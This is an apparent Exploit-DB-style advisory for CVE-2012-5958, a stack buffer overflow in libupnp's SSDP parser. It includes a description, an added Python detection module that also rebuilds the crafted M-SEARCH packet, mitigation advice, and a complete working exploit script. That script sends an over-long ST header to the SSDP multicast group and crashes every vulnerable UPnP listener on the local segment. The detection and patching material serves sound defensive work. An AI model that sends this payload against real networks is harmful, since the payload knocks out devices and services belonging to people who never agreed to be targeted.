Vendor: libupnp
Author: Patrik Lantz
CVSS: 7.5 (HIGH)
CWE: CWE-119, Stack-based buffer overflow
Product Name: libupnp
Affected Versions: <= 1.6.6 (tested); all releases before 1.6.18 are affected
Patch Exists: YES (fixed in 1.6.18)
Related CVE: CVE-2012-5958
CPE: a:pupnp:libupnp
Other Scripts: N/A
Platforms Tested: Linux
Published: 2020

libupnp 1.6.18 – Stack-based buffer overflow (DoS)

A stack-based buffer overflow exists in the SSDP parser of libupnp (the unique_service_name() function in ssdp/ssdp_server.c) in versions before 1.6.18, tracked as CVE-2012-5958; the proof of concept below was tested against 1.6.6. The parser does not validate the length of attacker-controlled data from the ST header of an M-SEARCH request before copying it into a fixed-size stack buffer. A remote, unauthenticated attacker can send a single crafted M-SEARCH datagram, unicast to UDP port 1900 or multicast to the SSDP group 239.255.255.250:1900 so that every UPnP device on the local segment processes it, and crash the listening process (denial of service). Because the overwritten buffer is on the stack, the CVE record rates the flaw as potentially allowing arbitrary code execution in the context of the UPnP application; this proof of concept only demonstrates the crash.
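As an added example, not taken from the original page or from the libupnp project: a small Python module that builds an SSDP M-SEARCH datagram generically, reproduces the page's crafted ST value, and runs a detection check over datagrams so a responder or IDS author can spot this packet shape. Two things are assumptions: the 180-byte limit (taken from libupnp's LINE_SIZE constant, which sizes the UDN field) and the copy-length model, which measures the ST text from the ":device" or ":service" marker up to ":urn" as a simplified stand-in for what the vulnerable parser copies, not its exact code.

```python
"""SSDP M-SEARCH inspection for the CVE-2012-5958 packet shape.

Added example, not code from the page or from libupnp.
Assumptions: UDN_MAX mirrors libupnp's LINE_SIZE (180); the segment
measured by udn_segment_length() is a simplified model of the copy
the vulnerable parser performs, not a transcription of its source.
"""

UDN_MAX = 180  # assumed size of the fixed UDN buffer (libupnp LINE_SIZE)


def build_msearch(st: str, mx: int = 2) -> bytes:
    """Build an SSDP M-SEARCH datagram carrying the given ST header value."""
    lines = [
        "M-SEARCH * HTTP/1.1",
        "HOST: 239.255.255.250:1900",
        f"ST:{st}",
        f"MX:{mx}",
        'MAN:"ssdp:discover"',
    ]
    return ("\r\n".join(lines) + "\r\n\r\n").encode("ascii")


def crafted_st(pad: int = 324, tail: str = "BBBB") -> str:
    """Reproduce the page's ST value: uuid:schemas:device:<pad><tail>:urn:"""
    return "uuid:schemas:device:" + "A" * pad + tail + ":urn:"


def parse_headers(datagram: bytes) -> dict:
    """Split an SSDP datagram into its request line and lower-cased headers."""
    text = datagram.decode("latin-1")
    head, _, _body = text.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    headers = {"_request": request_line}
    for line in header_lines:
        # Split on the first colon only: the ST value itself contains colons.
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def udn_segment_length(st: str) -> int:
    """Model of the byte count the vulnerable copy would use for a
    uuid:schemas ST value: from ':device' (or ':service') up to ':urn'.
    Returns -1 when the value does not have that shape."""
    if "uuid:schemas" not in st:
        return -1
    start = st.find(":device")
    if start == -1:
        start = st.find(":service")
    end = st.find(":urn")
    if start == -1 or end == -1 or end < start:
        return -1
    return end - start


def is_suspicious_msearch(datagram: bytes) -> bool:
    """True when an M-SEARCH carries a uuid:schemas ST segment that would
    not fit in the UDN_MAX-byte buffer."""
    hdrs = parse_headers(datagram)
    if not hdrs["_request"].upper().startswith("M-SEARCH"):
        return False
    return udn_segment_length(hdrs.get("st", "")) >= UDN_MAX


if __name__ == "__main__":
    # Constructed samples: the page's crafted packet and an ordinary discovery.
    for sample in (build_msearch(crafted_st()), build_msearch("ssdp:all")):
        st = parse_headers(sample).get("st", "")
        print(len(sample), "bytes, ST segment", udn_segment_length(st),
              "suspicious" if is_suspicious_msearch(sample) else "benign")
```

The check keys on the length of the uuid:schemas segment rather than on the "A"*324 pattern, so padding with other bytes or a different filler length still triggers it; an ordinary `ssdp:all` or `upnp:rootdevice` search, and a short `uuid:schemas:device:...:urn:` value, pass through.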

Mitigation:

Upgrade to libupnp 1.6.18 or later, the release that fixes CVE-2012-5958 in the SSDP parser. Where an upgrade is not immediately possible, do not expose UDP port 1900 beyond the trusted local segment, and filter SSDP at the network edge.

Exploit-DB raw data:

# Exploit Title: libupnp 1.6.18 - Stack-based buffer overflow (DoS)
# Date: 2020-08-20
# Exploit Author: Patrik Lantz
# Vendor Homepage: https://pupnp.sourceforge.io/
# Software Link: https://sourceforge.net/projects/pupnp/files/pupnp/libUPnP%201.6.6/libupnp-1.6.6.tar.bz2/download
# Version: <= 1.6.6
# Tested on: Linux
# CVE : CVE-2012-5958

import socket

# Crafted ST header: the over-long uuid:schemas:device:...:urn segment
# overflows the fixed-size UDN buffer in libupnp's SSDP parser.
payload = "M-SEARCH * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\nST:uuid:schemas:device:"
payload += "A"*324 + "BBBB"
payload += ":urn:\r\nMX:2\r\nMAN:\"ssdp:discover\"\r\n\r\n"

# The original used bytes(payload), which only works on Python 2;
# on Python 3 the string must be encoded explicitly.
byte_message = payload.encode("ascii")
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Sent to the SSDP multicast group, so every UPnP listener on the local
# segment processes the datagram; replace with a unicast address to target one host.
s.sendto(byte_message, ("239.255.255.250", 1900))
s.close()